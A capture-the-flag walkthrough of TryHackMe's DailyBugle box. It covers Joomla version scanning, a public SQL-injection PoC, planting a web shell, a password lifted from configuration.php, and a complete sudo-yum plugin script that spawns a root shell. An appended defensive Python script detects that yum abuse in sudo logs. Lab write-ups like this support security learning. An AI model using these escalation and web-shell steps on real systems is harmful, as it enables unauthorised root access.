DailyBugle|TryHackMe

What is the Joomla version?

msf6 > search joomla

14 auxiliary/scanner/http/joomla_version normal No Joomla Version Scanner

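The version is 3.7.0.

searchsploit joomla 3.7.0 turns up a sqlmap payload, but it takes too long. The hint says: Instead of using SQLMap, why not use a python script!

Found a PoC on GitHub: GitHub - Siopy/CVE-2017-8917: CVE-2017-8917 - Joomla 3.7.0 'com_fields' SQL Injection

Reverse-look up the hash on hashes.com.

Log in at http://10.10.82.60/administrator.

Edit a template, add a one-line web shell, and connect to it with msf / China Chopper.

The current user is apache; under /home there is a user jjameson.

./configuration.php contains a password: nv5uz9r3ZEDzVjNu, and the login succeeds.

sudo -l shows that yum can be run with sudo.

yum | GTFOBins: privilege escalation via yum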

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF

Then run sudo yum -c $TF/x --enableplugin=y

Got root.
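
Added example, not part of the original write-up: a defender-side check for the sudo yum step above. It scans sudo log lines for root yum runs that load a config file from outside /etc or force-enable a plugin. The log lines, the host name and the rule that trusted configs live under /etc are constructed assumptions.

```python
import posixpath
import re
import shlex

# USER= and COMMAND= fields of a standard sudo syslog entry.
SUDO_RE = re.compile(
    r"sudo(?:\[\d+\])?:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$")
TRUSTED_CONF_DIR = "/etc/"  # assumption: legitimate yum configs live under /etc

def yum_findings(args):
    """Return reasons a yum argument list matches the plugin-loading pattern."""
    reasons = []
    for i, arg in enumerate(args):
        conf = None
        if arg in ("-c", "--config") and i + 1 < len(args):
            conf = args[i + 1]
        elif arg.startswith("--config="):
            conf = arg.split("=", 1)[1]
        elif arg.startswith("-c") and len(arg) > 2:
            conf = arg[2:]
        if conf is not None:
            conf = posixpath.normpath(conf)  # collapse /etc/../tmp style paths
            if not conf.startswith(TRUSTED_CONF_DIR):
                reasons.append("config outside /etc: " + conf)
        if arg.startswith("--enableplugin"):
            reasons.append("plugin force-enabled: " + arg)
    return reasons

def scan(lines):
    """Return (user, command, reasons) for suspicious sudo-to-root yum runs."""
    hits = []
    for line in lines:
        m = SUDO_RE.search(line)
        if not m or m.group("runas") != "root":
            continue
        try:
            argv = shlex.split(m.group("cmd"))
        except ValueError:  # unbalanced quotes in the logged command
            continue
        if argv and posixpath.basename(argv[0]) == "yum":
            reasons = yum_findings(argv[1:])
            if reasons:
                hits.append((m.group("user"), m.group("cmd"), reasons))
    return hits

# Constructed sample log lines (not taken from the target machine).
SAMPLE_LOG = [
    "Jan 10 09:01:12 host sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/usr/bin/yum -c /tmp/tmp.k3Qx/x --enableplugin=y",
    "Jan 10 09:05:40 host sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/usr/bin/yum update -y",
    "Jan 10 09:07:02 host sudo: jjameson : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/yum --config=/etc/../tmp/x list",
]
```

Calling scan(SAMPLE_LOG) flags the first and third lines and leaves the plain yum update alone.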